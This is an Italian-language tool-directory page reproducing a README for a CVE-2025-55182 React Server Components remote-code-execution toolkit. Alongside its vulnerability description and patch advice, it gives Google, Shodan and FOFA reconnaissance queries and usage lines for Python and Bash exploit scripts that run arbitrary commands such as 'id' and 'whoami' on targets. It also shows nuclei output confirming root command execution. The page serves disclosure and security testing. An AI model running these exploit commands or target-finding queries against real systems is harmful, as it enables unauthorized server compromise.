Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182 — Una vulnerabilità critica di esecuzione remota di codice (Remote Code Execution, RCE) che interessa l'implementazione dei React Server Components (RSC) all'interno di più pacchetti, inclusi. | Kitploit
Strumenti/GitHubGitHub/cyberleelawat/cve-2025-55182
Scanner di VulnerabilitàAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubcyberleelawat/cve-2025-55182

CVE-2025-55182

Una vulnerabilità critica di esecuzione remota di codice (Remote Code Execution, RCE) che interessa l'implementazione dei React Server Components (RSC) all'interno di più pacchetti, inclusi.

112 mesi faNon ancora revisionato
Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182 – Esecuzione di Codice Remota nei React Server Components

React2Shell Banner CVE-2025-55182 CVE-2025-66478 CVSS

Creato da : Virendra Kumar

Azienda : Cyber Leelawat

Sito web :

www.cyberleelawat.in

Panoramica

CVE-2025-55182 è una vulnerabilità critica di Esecuzione di Codice Remota (RCE) che colpisce l'implementazione dei React Server Components (RSC) in molteplici pacchetti, tra cui:

  • react-server-dom-webpack
  • react-server-dom-turbopack
  • react-server-dom-parcel

La vulnerabilità è dovuta alla deserializzazione non sicura dei payload inviati tramite il protocollo interno Flight utilizzato da RSC. Quando determinati input non attendibili passano attraverso i React Server Components tramite richieste HTTP, può essere innescata l'esecuzione di codice lato server.

Le versioni interessate includono:

  • 19.0.0
  • 19.1.0
  • 19.1.1
  • 19.2.0

Le versioni corrette includono:

  • 19.0.1
  • 19.1.2
  • 19.2.1

Come funziona la vulnerabilità (a livello generale)

I React Server Components accettano richieste lato client che vengono analizzate e deserializzate sul backend. La vulnerabilità deriva da controlli insufficienti sulla deserializzazione dei dati in ingresso, consentendo a payload appositamente costruiti di essere interpretati come componenti eseguibili lato server.

Quando ciò accade, può verificarsi l'esecuzione di JavaScript arbitrario sul server, che può portare alla compromissione completa del server a seconda dell'ambiente di hosting e dei privilegi.


Causa Principale

  • Mancanza di una corretta convalida degli input nei flussi del protocollo Flight di RSC.
  • Il confine di fiducia del server è stato erroneamente considerato sicuro.
  • Parsing lato server non sicuro di input utente non attendibili.

Impatto

Se sfruttata, un attaccante potrebbe essere in grado di:

  • Ottenere l'esecuzione di codice remota
  • Eseguire comandi arbitrari lato server
  • Accedere a risorse di database o a livello di sistema operativo
  • Installare malware o backdoor
  • Rubare dati sensibili
  • Effettuare movimento laterale all'interno dell'infrastruttura

Punteggio CVSS: 10.0 – CRITICO


Test Manuale (Identificazione Difensiva Sicura)

Obiettivo principale:

Verificare se l'applicazione espone React Server Components e se sono in uso versioni interessate.

Passo 1 — Verifica della presenza di RSC tramite le caratteristiche della risposta

root@kitploit:~
curl -I https://target.com/?__rsc=1

Ricognizione su Google (parole chiave difensive)

Queste parole chiave aiutano a identificare se un repository o un'applicazione web pubblica fa riferimento a componenti RSC.

root@kitploit:~
"React Server Components" "Flight" inurl:src
"react-server-dom-webpack" filetype:lock
"server.references" "react"
"rsc" "react-dom"

Verifica:

  • Le funzionalità RSC sono presenti?
  • I pacchetti sono visibili nei bundle front-end?
  • Riferimenti Git pubblici?

Esempi di Query Google Interne (solo per il proprio perimetro)

root@kitploit:~
site:yourdomain.com "react-server"
site:yourdomain.com "flight" "react"
site:yourdomain.com "rsc"

Destinato esclusivamente all'audit interno del dominio della tua organizzazione.


Shodan (fingerprinting tecnologico SICURO)

Verifica l'uso del framework esposto, non lo sfruttamento della vulnerabilità.

root@kitploit:~
http.title:"Next.js"
"powered by" "Next.js"
X-Powered-By: Next.js
http.favicon.hash=

FOFA Solo Classificazione Tecnologica

root@kitploit:~
title="Next.js"
header="next-router-state-tree"
body="/_next/static/"
server="next"

Test Automatico (Interno / Laboratorio)

Per automatizzare la scansione difensiva, clona la logica di rilevamento basata su template per la valutazione della tua infrastruttura:

root@kitploit:~
git clone https://github.com/cyberleelawat/CVE-2025-55182.git
cd CVE-2025-55182

Template Nuclei

root@kitploit:~
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml

[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.

Exploit RCE in Python (CVE-2025-55182.py)

Script exploit RCE completo che esegue comandi arbitrari e recupera l'output.

Utilizzo:

root@kitploit:~
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"

Exploit Bash

Installazione

root@kitploit:~
chmod +x scanner.sh

Utilizzo

root@kitploit:~
# Scan with default command (id)
./scanner.sh -d example.com

# Execute custom command
./scanner.sh -d example.com -c "whoami"

# With full URL
./scanner.sh -d https://example.com -c "uname -a"

Opzioni

  • -d, --domain - Dominio/URL target (obbligatorio)
  • -c, --command - Comando da eseguire (predefinito: id)

Esempi

root@kitploit:~
# Check if target is vulnerable
./scanner.sh -d vulnerable-app.com

# Get system information
./scanner.sh -d vulnerable-app.com -c "uname -a"

# List files
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"

Requisiti

  • Bash

  • curl

  • openssl

    Crediti: script Bash e Python creati originariamente da @zack0x01 e @sickwell. Utilizzati con apprezzamento.

I template all'interno del repository sono pensati per:

  • identificazione delle versioni
  • controlli di visibilità
  • inventario dell'infrastruttura
  • consapevolezza delle vulnerabilità

IMPORTANTE: questi template devono essere eseguiti esclusivamente su sistemi di tua proprietà o per i quali sei autorizzato a effettuare valutazioni.


Nuclei (Dichiarazione di Utilizzo Difensivo)

I template Nuclei inclusi in questo repository sono destinati esclusivamente a:

  • validazione delle versioni delle dipendenze
  • fingerprinting indiretto
  • controlli passivi
  • audit di sicurezza interno

Assicurati di:

  • disporre di autorizzazione scritta
  • scansionare solo i tuoi asset
  • rispettare leggi e policy locali

Mitigazioni Consigliate

Aggiorna immediatamente

Passa a una delle release corrette:

  • 19.0.1
  • 19.1.2
  • 19.2.1

Se non puoi applicare la patch immediatamente

  • disabilita temporaneamente le funzionalità RSC
  • isola i componenti server
  • implementa regole WAF
  • limita la superficie di rete esposta

🤝 Connettiti Con Me

👨‍💻 Cyber Leelawat

Ricercatore di Sicurezza • Formatore di Cyber Security • Bug Bounty Hunter

Motto: Zero Trust Full Secure 🚀

GitHub Instagram
LinkedIn WhatsApp Channel
WhatsApp Group

Conclusione

CVE-2025-55182 è attualmente una delle minacce più critiche per le infrastrutture basate su React. A causa del vettore di sfruttamento banale e della superficie d'attacco non autenticata, è fortemente consigliata l'applicazione immediata della patch. Qualsiasi organizzazione che esegue versioni RSC interessate dovrebbe considerare una priorità di emergenza.


Avviso Legale / Etico

Questo repository e la documentazione sono destinati alla ricerca difensiva e alla validazione della sicurezza degli asset di tua proprietà. Qualsiasi uso improprio può essere illegale. Sei responsabile del rispetto delle leggi e delle policy organizzative.

Fatto con ❤️ da Cyber Leelawat

Zero Trust Full Secure 🎯🔐

Scarica lo strumento